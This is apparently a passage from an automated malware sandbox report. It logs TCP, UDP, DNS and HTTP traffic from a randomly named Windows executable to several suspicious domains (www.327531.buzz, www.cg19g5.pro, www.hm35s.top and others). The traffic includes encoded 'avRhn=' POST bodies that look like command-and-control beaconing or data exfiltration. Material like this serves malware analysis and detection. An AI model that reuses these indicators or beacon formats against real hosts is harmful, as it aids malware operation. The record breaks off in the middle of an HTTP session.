                                              Jan 11, 2025 05:22:47.764566898 CET8049937154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:47.764671087 CET8049937154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:47.764734983 CET4993780192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:48.380614996 CET4993780192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:49.399291992 CET4995580192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:49.405056953 CET8049955154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:49.405148983 CET4995580192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:49.415225983 CET4995580192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:49.420130968 CET8049955154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:50.301038027 CET8049955154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:50.301075935 CET8049955154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:50.301222086 CET4995580192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:50.304053068 CET4995580192.168.2.8154.88.22.107
                                              Jan 11, 2025 05:22:50.308883905 CET8049955154.88.22.107192.168.2.8
                                              Jan 11, 2025 05:22:55.925426006 CET4998880192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:22:55.930398941 CET8049988154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:22:55.930505991 CET4998880192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:22:56.061652899 CET4998880192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:22:56.066663980 CET8049988154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:22:56.825022936 CET8049988154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:22:56.825100899 CET8049988154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:22:56.825315952 CET4998880192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:22:57.583508968 CET4998880192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:22:58.603209019 CET4998980192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:22:58.608226061 CET8049989154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:22:58.608345985 CET4998980192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:22:58.624088049 CET4998980192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:22:58.628864050 CET8049989154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:22:59.498217106 CET8049989154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:22:59.498251915 CET8049989154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:22:59.498294115 CET4998980192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:23:00.661525965 CET4998980192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:23:01.680283070 CET4999080192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:23:01.685308933 CET8049990154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:23:01.685529947 CET4999080192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:23:01.700735092 CET4999080192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:23:01.705704927 CET8049990154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:23:01.705770016 CET8049990154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:23:02.595653057 CET8049990154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:23:02.595755100 CET8049990154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:23:02.595855951 CET4999080192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:23:03.208468914 CET4999080192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:23:04.227407932 CET4999180192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:23:04.232355118 CET8049991154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:23:04.232513905 CET4999180192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:23:04.242371082 CET4999180192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:23:04.247241020 CET8049991154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:23:05.129399061 CET8049991154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:23:05.129503012 CET8049991154.23.184.95192.168.2.8
                                              Jan 11, 2025 05:23:05.129590988 CET4999180192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:23:05.132559061 CET4999180192.168.2.8154.23.184.95
                                              Jan 11, 2025 05:23:05.137392044 CET8049991154.23.184.95192.168.2.8

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 11, 2025 05:21:51.308438063 CET5591953192.168.2.81.1.1.1
                                              Jan 11, 2025 05:21:51.320138931 CET53559191.1.1.1192.168.2.8
                                              Jan 11, 2025 05:22:07.035612106 CET5641853192.168.2.81.1.1.1
                                              Jan 11, 2025 05:22:07.048393965 CET53564181.1.1.1192.168.2.8
                                              Jan 11, 2025 05:22:41.728967905 CET6506853192.168.2.81.1.1.1
                                              Jan 11, 2025 05:22:41.745466948 CET53650681.1.1.1192.168.2.8
                                              Jan 11, 2025 05:22:55.321582079 CET6501053192.168.2.81.1.1.1
                                              Jan 11, 2025 05:22:55.877412081 CET53650101.1.1.1192.168.2.8

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jan 11, 2025 05:21:51.308438063 CET192.168.2.81.1.1.10x67aaStandard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                              Jan 11, 2025 05:22:07.035612106 CET192.168.2.81.1.1.10x17b3Standard query (0)www.327531.buzzA (IP address)IN (0x0001)false
                                              Jan 11, 2025 05:22:41.728967905 CET192.168.2.81.1.1.10xd077Standard query (0)www.cg19g5.proA (IP address)IN (0x0001)false
                                              Jan 11, 2025 05:22:55.321582079 CET192.168.2.81.1.1.10x18a2Standard query (0)www.hm35s.topA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jan 11, 2025 05:21:51.320138931 CET1.1.1.1192.168.2.80x67aaNo error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                              Jan 11, 2025 05:21:51.320138931 CET1.1.1.1192.168.2.80x67aaNo error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                              Jan 11, 2025 05:22:07.048393965 CET1.1.1.1192.168.2.80x17b3No error (0)www.327531.buzz43.199.54.158A (IP address)IN (0x0001)false
                                              Jan 11, 2025 05:22:41.745466948 CET1.1.1.1192.168.2.80xd077No error (0)www.cg19g5.pro154.88.22.107A (IP address)IN (0x0001)false
                                              Jan 11, 2025 05:22:55.877412081 CET1.1.1.1192.168.2.80x18a2No error (0)www.hm35s.tophm35s.topCNAME (Canonical name)IN (0x0001)false
                                              Jan 11, 2025 05:22:55.877412081 CET1.1.1.1192.168.2.80x18a2No error (0)hm35s.top154.23.184.95A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.vayui.top
                                              • www.327531.buzz
                                              • www.cg19g5.pro
                                              • www.hm35s.top

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.849712172.67.145.234805124C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 11, 2025 05:21:51.385659933 CET509OUTGET /7nvw/?avRhn=bbdDITTjVn5ZxI6GN1reGwP2o2vtBS0PP+WRiGeKfyb/2X6tLhCWc3R74LhPSoYzFVfNV33VjCQJaZkJOo229iZLjgC+IdiuBJhC/u8wioHnAK20zfUoQLw8DCuNy8wJow==&fjo=vjgP0XDx HTTP/1.1
                                              Host: www.vayui.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Jan 11, 2025 05:21:51.966532946 CET923INHTTP/1.1 404 Not Found
                                              Date: Sat, 11 Jan 2025 04:21:51 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              cf-cache-status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMkFGydQEVcX%2FI72bpSlfhYmwMFAukZfdDVw01szeT4gepTsJezfmdSYCBPb%2Bw1NbyF%2FU8ciYdQ9pFM7%2BstEiHLAFqGEJAfnXlUALxS8VRsAkO%2F2DVsmpZm5iHlKcU05"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 90021f568bdc4240-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1557&rtt_var=778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                              Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.84971343.199.54.158805124C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 11, 2025 05:22:07.271908045 CET769OUTPOST /iodk/ HTTP/1.1
                                              Host: www.327531.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.327531.buzz
                                              Referer: http://www.327531.buzz/iodk/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 206
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 51 6b 75 75 35 31 62 6d 2b 4a 4a 32 75 6f 34 51 69 45 6e 68 59 75 32 49 69 79 53 33 59 47 69 2f 56 55 67 69 39 58 4e 66 6d 70 63 43 59 67 4e 32 67 4a 55 72 4f 54 35 4d 39 43 73 64 58 55 64 64 57 45 38 4f 54 74 44 35 38 43 76 41 2f 56 2b 32 6d 57 33 6b 75 6b 63 72 56 43 71 57 77 67 43 35 5a 6c 43 58 41 38 5a 4e 4f 57 6b 67 6b 6f 2f 51 34 54 63 58 66 62 61 44 61 32 46 47 38 4f 76 77 56 74 77 50 70 67 4b 46 2b 4a 69 51 2b 50 54 77 2f 4d 32 79 61 73 39 61 46 4b 37 74 2b 52 6a 4a 5a 45 6b 31 2b 66 55 33 4a 30 30 61 44 39 6f 4d 7a 33 54 69 57 39 6f 62 2f 76 7a 53 41 37 53 44 4d 76 61 65 4b 45 34 3d
                                              Data Ascii: avRhn=Qkuu51bm+JJ2uo4QiEnhYu2IiyS3YGi/VUgi9XNfmpcCYgN2gJUrOT5M9CsdXUddWE8OTtD58CvA/V+2mW3kukcrVCqWwgC5ZlCXA8ZNOWkgko/Q4TcXfbaDa2FG8OvwVtwPpgKF+JiQ+PTw/M2yas9aFK7t+RjJZEk1+fU3J00aD9oMz3TiW9ob/vzSA7SDMvaeKE4=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.84971443.199.54.158805124C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 11, 2025 05:22:10.060489893 CET789OUTPOST /iodk/ HTTP/1.1
                                              Host: www.327531.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.327531.buzz
                                              Referer: http://www.327531.buzz/iodk/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 226
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 51 6b 75 75 35 31 62 6d 2b 4a 4a 32 76 49 6f 51 78 56 6e 68 49 2b 32 50 6e 79 53 33 54 6d 69 37 56 55 38 69 39 57 35 50 6d 62 34 43 59 44 5a 32 76 6f 55 72 4a 54 35 4d 7a 69 73 63 54 55 64 4b 57 45 41 73 54 6f 37 35 38 43 72 41 2f 51 43 32 6d 6c 66 72 74 55 63 70 4f 53 71 51 2f 41 43 35 5a 6c 43 58 41 34 77 71 4f 57 63 67 6b 59 76 51 35 79 63 59 58 37 61 43 4e 47 46 47 34 4f 76 30 56 74 77 58 70 68 57 76 2b 50 6d 51 2b 4b 33 77 2b 5a 43 78 41 38 39 59 61 61 37 2b 34 53 2b 48 63 33 31 52 77 2b 51 31 48 6b 67 6d 50 72 5a 6d 70 56 62 6b 56 39 41 77 2f 73 62 6b 46 4d 50 72 57 4d 4b 75 55 54 73 70 66 71 66 39 4a 6e 61 4a 6f 4d 38 2b 39 55 4c 42 76 6f 65 6b
                                              Data Ascii: avRhn=Qkuu51bm+JJ2vIoQxVnhI+2PnyS3Tmi7VU8i9W5Pmb4CYDZ2voUrJT5MziscTUdKWEAsTo758CrA/QC2mlfrtUcpOSqQ/AC5ZlCXA4wqOWcgkYvQ5ycYX7aCNGFG4Ov0VtwXphWv+PmQ+K3w+ZCxA89Yaa7+4S+Hc31Rw+Q1HkgmPrZmpVbkV9Aw/sbkFMPrWMKuUTspfqf9JnaJoM8+9ULBvoek


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.84972743.199.54.158805124C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 11, 2025 05:22:12.801029921 CET1806OUTPOST /iodk/ HTTP/1.1
                                              Host: www.327531.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.327531.buzz
                                              Referer: http://www.327531.buzz/iodk/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 1242
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 51 6b 75 75 35 31 62 6d 2b 4a 4a 32 76 49 6f 51 78 56 6e 68 49 2b 32 50 6e 79 53 33 54 6d 69 37 56 55 38 69 39 57 35 50 6d 62 77 43 62 7a 46 32 75 4c 4d 72 49 54 35 4d 74 79 73 5a 54 55 64 79 57 41 55 6f 54 6f 2b 4d 38 42 44 41 74 43 61 32 78 6b 66 72 32 6b 63 70 48 79 71 56 77 67 43 57 5a 6c 53 62 41 38 73 71 4f 57 63 67 6b 64 72 51 6f 6a 63 59 56 37 61 44 61 32 46 4b 38 4f 75 54 56 74 6f 48 70 68 53 56 2f 38 75 51 2f 71 6e 77 38 76 65 78 59 73 39 47 62 61 36 6a 34 53 79 4d 63 33 6f 6f 77 2b 6b 62 48 6d 41 6d 4c 4b 34 67 78 6c 4f 37 4b 37 4d 68 6e 37 33 59 4d 2f 76 48 65 63 75 43 58 42 41 66 58 74 4c 70 4a 45 75 6e 6e 72 74 70 38 41 37 6d 72 6f 72 4e 36 4d 6b 62 39 71 71 4c 53 4a 7a 6e 68 75 56 42 33 76 35 30 55 76 62 77 7a 57 51 4e 44 75 30 38 36 56 48 77 75 6a 68 75 30 7a 50 55 32 73 66 63 77 34 4c 4f 32 65 59 42 46 30 48 69 46 45 6c 30 2b 66 56 73 48 46 39 79 6e 53 31 48 34 6d 6d 6e 32 32 53 36 31 62 62 33 44 74 2b 42 35 5a 58 48 54 45 43 53 4b 47 50 2f 69 78 59 34 64 52 32 42 [TRUNCATED]
                                              Data Ascii: avRhn=Qkuu51bm+JJ2vIoQxVnhI+2PnyS3Tmi7VU8i9W5PmbwCbzF2uLMrIT5MtysZTUdyWAUoTo+M8BDAtCa2xkfr2kcpHyqVwgCWZlSbA8sqOWcgkdrQojcYV7aDa2FK8OuTVtoHphSV/8uQ/qnw8vexYs9Gba6j4SyMc3oow+kbHmAmLK4gxlO7K7Mhn73YM/vHecuCXBAfXtLpJEunnrtp8A7mrorN6Mkb9qqLSJznhuVB3v50UvbwzWQNDu086VHwujhu0zPU2sfcw4LO2eYBF0HiFEl0+fVsHF9ynS1H4mmn22S61bb3Dt+B5ZXHTECSKGP/ixY4dR2BOFio7uyanjxn/JYlj16/YDiY9PbnEr0HWn3IVzg6zMIkgcHINpzwhkkmhK8sVbKDBUp5dG2+vbFPEFKvxLslVGbfKX03eXclkSySyUncfYzq1q0wOWSdbMdE07S+RSwvMwmzYPw9i/h2E0a1OK9Q9D+4+Do90EQyM5ShnBLoQq7F7GlmVxkV9cwzDAH8E8uImIJcmZZgI7tr34EGkkZvgt0waTTDbG72NySFO7MdTQivGuxbo+sumdiMC3fz1VAtmIy24liLA8drL73p5MB+eZ7cOhx7lR+KeeOYUNkPDCUGyYWVkml9Wz7Aox/fm/jF/+qv5EYwsnA5vCw7kVWPb2u1Kj83a8qI7Vflk7Bs0Kxbv1KMTk7/jODTnBYN3iKWtoOrRxgf8CcBDkr5yKjbjmmSDVEPXEW3T0eH0dVutQQiadQYYSBNpKmfnVMnx8eSTbVCfXppLp9KFc/0MXTX3/BheD5CwE89a2FJcM3iayxuH2rNiXIwVHRf7HjHAw7dK70ZEhtPrUjBZ0D7TQfzpKmEn53kPAP9FwdpZ31YDGt/YTdvdKEnJ6mcxZs76fRwe5oxUdpojm6nCIjTzIPR3XVw9hsCmdukOpEY2b0s5HuI/W7CNhCk6sUwpV8JLhLy77aVK8qCOjjpg0VhPpFmAg/hsRKWFpluBH [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.84974443.199.54.158805124C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 11, 2025 05:22:15.354065895 CET511OUTGET /iodk/?avRhn=dmGO6CepyY0nvsEd+06VKI64gib0AW2YSER1oXhei8AaXzs2ne8+dyZVwWklDlgafwdROfr4xQPj+g6hlFS8zXJSWm+a/FKDEmKpBMgLDWMch8H+yCAXb5nRSFJrzKqcGg==&fjo=vjgP0XDx HTTP/1.1
                                              Host: www.327531.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.849906154.88.22.107805124C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 11, 2025 05:22:41.773291111 CET766OUTPOST /63n1/ HTTP/1.1
                                              Host: www.cg19g5.pro
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.cg19g5.pro
                                              Referer: http://www.cg19g5.pro/63n1/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 206
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 39 7a 69 76 33 2f 7a 76 42 31 42 74 66 45 44 51 6d 44 2b 72 6e 57 53 41 66 67 30 50 64 68 64 2f 43 64 6f 37 55 7a 4b 48 4a 33 44 46 4a 38 41 2b 78 64 37 75 45 6d 4e 57 6b 55 74 4c 4b 32 7a 66 32 79 30 4b 75 4f 6b 4d 5a 43 73 61 2f 50 74 55 41 30 77 62 73 38 79 53 48 6d 67 4d 59 43 48 73 36 35 71 50 78 56 76 62 79 59 5a 67 34 45 70 78 7a 34 37 4f 37 79 2b 4c 2b 6d 77 61 4b 73 30 57 57 6b 65 70 32 76 49 71 2b 67 75 5a 4b 54 74 34 74 55 6b 6b 73 76 6c 48 43 56 7a 56 79 6a 77 4d 79 39 71 45 55 2b 2f 59 6a 30 6c 2f 5a 69 33 33 74 51 56 44 75 4f 79 31 4c 46 61 4c 77 2b 33 44 6c 2b 54 38 61 45 77 3d
                                              Data Ascii: avRhn=9ziv3/zvB1BtfEDQmD+rnWSAfg0Pdhd/Cdo7UzKHJ3DFJ8A+xd7uEmNWkUtLK2zf2y0KuOkMZCsa/PtUA0wbs8ySHmgMYCHs65qPxVvbyYZg4Epxz47O7y+L+mwaKs0WWkep2vIq+guZKTt4tUkksvlHCVzVyjwMy9qEU+/Yj0l/Zi33tQVDuOy1LFaLw+3Dl+T8aEw=
                                              Jan 11, 2025 05:22:42.651037931 CET364INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:22:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Encoding: gzip
                                              Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 26 be 46 5e 19 3e b9 7e 79 be 21 39 85 91 c1 a6 e5 c9 b9 16 66 7e 59 91 95 fe 8e b6 b6 ea 9a 36 fa 50 13 01 42 55 a9 14 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 67)N.,(ON,VPV/Ji%IAf>&F^>~y!9f~Y6PBUZ0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.849924154.88.22.107805124C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 11, 2025 05:22:44.326875925 CET786OUTPOST /63n1/ HTTP/1.1
                                              Host: www.cg19g5.pro
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.cg19g5.pro
                                              Referer: http://www.cg19g5.pro/63n1/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 226
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 39 7a 69 76 33 2f 7a 76 42 31 42 74 65 6b 7a 51 6b 67 6d 72 6c 32 53 50 51 41 30 50 58 42 64 6a 43 64 73 37 55 78 6e 61 4b 43 54 46 4b 64 77 2b 77 59 62 75 48 6d 4e 57 73 30 74 4f 45 57 7a 41 32 31 39 31 75 4c 45 4d 5a 43 49 61 2f 4b 52 55 41 6e 49 63 74 73 79 51 50 47 67 4f 56 69 48 73 36 35 71 50 78 56 37 39 79 59 42 67 34 30 35 78 7a 5a 37 4e 7a 53 2b 55 39 6d 77 61 4f 73 30 53 57 6b 66 4d 32 75 6b 4d 2b 69 6d 5a 4b 54 64 34 74 68 45 6c 6d 76 6c 46 66 46 7a 4c 37 7a 51 46 37 76 53 6f 63 74 72 64 74 58 6c 53 63 55 47 64 33 79 64 46 74 4f 61 65 4c 47 79 39 31 4a 71 72 2f 64 44 4d 45 54 6d 73 45 58 4d 64 68 70 2b 35 4a 75 73 69 34 42 65 43 4c 78 4b 64
                                              Data Ascii: avRhn=9ziv3/zvB1BtekzQkgmrl2SPQA0PXBdjCds7UxnaKCTFKdw+wYbuHmNWs0tOEWzA2191uLEMZCIa/KRUAnIctsyQPGgOViHs65qPxV79yYBg405xzZ7NzS+U9mwaOs0SWkfM2ukM+imZKTd4thElmvlFfFzL7zQF7vSoctrdtXlScUGd3ydFtOaeLGy91Jqr/dDMETmsEXMdhp+5Jusi4BeCLxKd
                                              Jan 11, 2025 05:22:45.209973097 CET364INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:22:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Encoding: gzip
                                              Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 26 be 46 5e 19 3e b9 7e 79 be 21 39 85 91 c1 a6 e5 c9 b9 16 66 7e 59 91 95 fe 8e b6 b6 ea 9a 36 fa 50 13 01 42 55 a9 14 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 67)N.,(ON,VPV/Ji%IAf>&F^>~y!9f~Y6PBUZ0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.849937154.88.22.107805124C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 11, 2025 05:22:46.874960899 CET1803OUTPOST /63n1/ HTTP/1.1
                                              Host: www.cg19g5.pro
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.cg19g5.pro
                                              Referer: http://www.cg19g5.pro/63n1/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 1242
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
